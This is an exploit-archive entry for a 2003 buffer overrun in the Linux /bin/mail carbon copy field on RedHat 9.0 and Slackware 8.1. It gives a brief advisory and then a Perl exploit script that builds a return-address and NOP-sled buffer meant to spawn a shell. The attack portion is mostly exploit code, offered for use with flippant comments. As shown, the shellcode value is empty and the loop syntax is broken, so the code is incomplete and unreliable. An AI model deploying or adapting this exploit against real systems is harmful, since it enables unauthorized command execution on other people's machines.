RedHat 9.0,Slackware 8.1 /bin/mail Carbon Copy Field Buffer Overrun Vulnerability

metasploit 30.05.2003 Verified
Local Exploits Linux

Exploit Code


A vulnerability has been discovered in the Linux /bin/mail utility. The problem occurs when processing excessive data within the carbon copy field. Due to insufficient bounds checking while parsing this information it may be possible to trigger a buffer overrun.

An attacker could exploit this issue to execute arbitrary commands. It should be noted that local exploitation may be inconsequential, however a malicious e-mail message or CGI interface could be a sufficient conduit for remote exploitation.

# Released under the GPL by a bored Vulndev member
# email:
# The User 'cannot have expectations of privacy'. 
# For the Script to work you will need to:
# Run it, press 'return' once, then '.' then 'return'
#result = Shell (if you have /bin/ksh!)
# Anything you do with this script is your own problem,
# dont forget if you print it off, recycle!
# if you dont print it off, do so anyway 
# and use if for expensive toilet paper.
# Systems Tested on: (Please let me know the outcome of your own box)
# Redhat 9.0 -- Vulnerable
# Redhat 9.0 with St Jude and St Michael -- Not Vulnerable
# Slackware 8.1 -- Vulnerable
# Slackware 9.0 -- Not Vulnerable
# Debian 3.0 (Testing) -- May be vulnerable.. needing comfirmation.
$shellcode = 
$ret = 0xbffff714;
$buf = 8232;
$egg = 9000;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) 
$offset = $ARGV[0];
$addr = pack('l',($ret + $offset));
for ($i = 0; $i < $buf; $i += 4)
$buffer .= $addr;
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) 
 $buffer .= $nop;
$buffer .= $shellcode;